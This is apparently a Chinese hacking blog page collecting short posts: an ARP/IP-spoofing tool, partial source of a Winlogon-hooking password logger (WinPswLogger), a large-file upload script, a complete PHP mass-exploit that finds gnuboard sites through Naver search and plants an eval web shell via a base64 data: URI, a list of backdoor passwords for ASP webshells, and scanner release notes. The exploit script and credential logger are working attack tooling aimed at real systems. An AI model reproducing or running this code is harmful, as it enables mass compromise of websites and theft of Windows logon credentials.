Chinadu`s Blog

软件说明：
交换环境下的IP欺骗工具，本工具只供安全测试，严禁用于非法用途！网络环境参考http://icylife.net/yunshu/show.php?id=732

使用方法：
1.在参数设置中选择好工作网卡；
2.在将发送到 中填入一个不存在的IP地址例如 193.111.111.111
3.在伪装成 中填入要伪装的IP地址 例如 10.1.131.2；
4.在转发到中 填入真实的服务器地址 例如10.1.131.6；
5.应用程序访问2中的IP地址 例如正常访问时 http://10.1.131.6/ip.asp 此时应访问http://193.111.111.111/ip.asp

注意：需安装winpcap ，需安装.net framework 2.0，不支持无线网卡，网络环境可进行ARP欺骗。
阅读全文...

作者：LZX
部分源码如下，完整源码见文章末尾：

#include "stdafx.h"
#include
#include "debugoutput.h"
#include "hookWinlogon.h"

//CComModule _Module;
HMODULE g_hIns;

// BEGIN_OBJECT_MAP(ObjectMap)
// END_OBJECT_MAP()

/////////////////////////////////////////////////////////////////////////////
// DLL Entry Point

extern "C"
BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)
{
if (dwReason == DLL_PROCESS_ATTACH)
{
g_hIns = (HMODULE)hInstance;

}
else if (dwReason == DLL_PROCESS_DETACH)
{
}

return TRUE; // ok
}
/*
/////////////////////////////////////////////////////////////////////////////
// Used to determine whether the DLL can be unloaded by OLE

STDAPI DllCanUnloadNow(void)
{
//MessageBox(0, _T("a"), _T("b"), 0);
return S_OK;
}

/////////////////////////////////////////////////////////////////////////////
// Returns a class factory to create an object of the requested type

STDAPI DllGetClassObject(REFCLSID rclsid, REFIID riid, LPVOID* ppv)
{

return E_NOINTERFACE;
}

/////////////////////////////////////////////////////////////////////////////
// DllRegisterServer - Adds entries to the system registry

STDAPI DllRegisterServer(void)
{
return S_OK;
}

/////////////////////////////////////////////////////////////////////////////
// DllUnregisterServer - Removes entries from the system registry

STDAPI DllUnregisterServer(void)
{
return S_OK;
}
*/
HRESULT WINAPI DllInstall( BOOL bInstall,
LPCWSTR pszCmdLine
)
{
CHookWinlogon *pIns = new CHookWinlogon;

if (!pIns->Create(pszCmdLine))
return E_UNEXPECTED;

return S_OK;
}

下载：

WinPswLogger_src.rar

以下为李彦宏哥大演讲视频,拍摄自一位哥大的中国学生。
2009年9月17日，百度总裁李彦宏（Robin Li）前往纽约，为美国哥伦比亚大学的广大中国留学生进行精彩演讲:
阅读全文...

作者：Netpatch

有的时候，我们需要上传大东西，但是由于W2K3默认上传限制为200KB。这个时候，不得不分包，依次上传，那个累呀！
有人问为什么不用Microsoft.XMLHTTP和Adodb.Stream组件，直接从服务器上下载呢【要是不能访问网络呢？你会怎么做？】

于是有了这个超级上传程序。实践可以支持大于10M的文件!

暂时没测试出什么问题！若有问题,请留言！

转载请保留版权。谢谢合作!

SU.vbs ----- 客户端
s.asp ----- 服务端

使用方法:
阅读全文...

利用代码如下：

< ?php
echo" +----------------------------------------------------------------+\r\n";
echo" http://www.t00ls.net\r\n";
echo" +----------------------------------------------------------------+\r\n";
for ($ii=1;$ii<=99;$ii++)
{
$c=(int)$ii*10+1;
$a="web.search.naver.com";
$b="/search.naver?where=webkr&query=bbs/board.php&xc=&docid=0&lang=all&st=s&fd=2&start=".$c."&display=10&&qvt=0&sm=tab_pge";
get($a,$b);

}

function get($host,$file)
{

$fp = fsockopen($host, 80, $errno, $errstr, 10);
if (!$fp) {
echo "SocketError: $errstr ($errno)\n";
return false;
}
$get = "GET $file HTTP/1.1\r\n";
$get .= "Host: $host\r\n";
$get .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5\r\n";
$get .= "Referer: http://$host\r\n";
$get .= "Connection: Close\r\n";
$get .= "Cookie: nsr_acl_nautocomplete=1; NB=GIYTSNJYHE4DKMJX; NNB=AIUHYPM7OXJUS; page_uid=fOL9uloi5UNssbPX/M8sss--100532; _naver_usersession_=SdN7qBY700kAAAKIwME\r\n\r\n";
fwrite($fp, $get);
$response=stream_get_contents($fp);
preg_match_all("(http://[-\w.]+(:\d+)?(/([\w/_.]*)?)?bbs\/board\.php)",$response,$put);
for ($i=0;$i {
$a=(int)$i*3;

fuck($put[0][$a]);
//echo count($put[0]);
//print_r($put[0]);
//fuck($put[0][$i]);

break;

}

fclose($fp);

}

function fuck($ok)
{

$a=preg_replace('(bbs\/board.php)','',$ok);

$file=$a."common.php?g4_path=/tmp%002345";
$xxx=$a."common.php?g4_path=data:;base64,PD9mcHV0cyhmb3BlbignLi9kYXRhL29rLnBocCcsJ3crJyksJzw/cGhwIEBldmFsKCRfUE9TVFtjXSk7ZWNobyAiZnVja3lvdSI7Pz4nKTs/Pg==";
$shell=$a."data/ok.php";
$target=parse_url($ok);
$sitepath=$target['host'];
$xx=@file_get_contents($file);
if(eregi("(Warning)",$xx)&&eregi("(tmp)",$xx))
{
print $sitepath." Vulnerability yes"."\r\n";
@file_get_contents($xxx);
$oksehll=@file_get_contents($shell);
if(!eregi("(\\02345)",$xx))
{
print $sitepath." %00 ok"."\r\n";
}

if (eregi("(fuckyou)",$oksehll))
{

print $shell." pass:c"."\r\n";
$axx="\r\n".$shell;
$sh=fopen('gnuboard.txt',"a+");
fwrite($sh,$axx);
fclose($sh);

}

}
else
{

print $sitepath." Vulnerability no"."\r\n";

}

}

?>

首先十三webshell9.0VIP版和漫步云端修改版,默认密码?x=x或?web=admin
还有易思免杀ASP大马,密码?PageName=PageName
黑羽黑客基地小马默认密码donqee或kaifeng
朽木奥运版最新ASP木马(黑色版本),朽木奥运版最新ASP木马(绿色版本)
黑客动画吧奥运版最新ASP木马(黑色版本),黑客动画吧最新ASP木马(绿色版本)
后门是?Pass=UserPass
这个麻烦点,输入后要刷新

下面是自五月份以来各个Build的情况：

Acunetix WVS Build History

Build v6.5.20090813 - 13th August 2009

Improvements:

• HTML forms settings node was renamed to Input Fields.  This node now can also be used to pre-define web services operations values.
• New SQL Injection tests added
• New XSS tests (unicode) added

Build v6.5.20090728 - 28th July 2009

New Features:

• Manual Intervention module: better support for CAPTCHA and modern authentication mechanisms

Improvements:

• Added new variants of blind SQL injection tests (now testing both AND and OR boolean operators)
• Added new tests for SQL Injection with charset GBK/Big5
• Added new variants for Cross site scripting

Bug Fixes:
阅读全文...

cnqing的幻境网盾3.6 发布了

更新内容：

1.减缓蓝屏

2.增加手动设置MAC功能

注意：

需要安装.net 2.0 + winpcap

更多帮助请参考旧版本

下载地址：
阅读全文...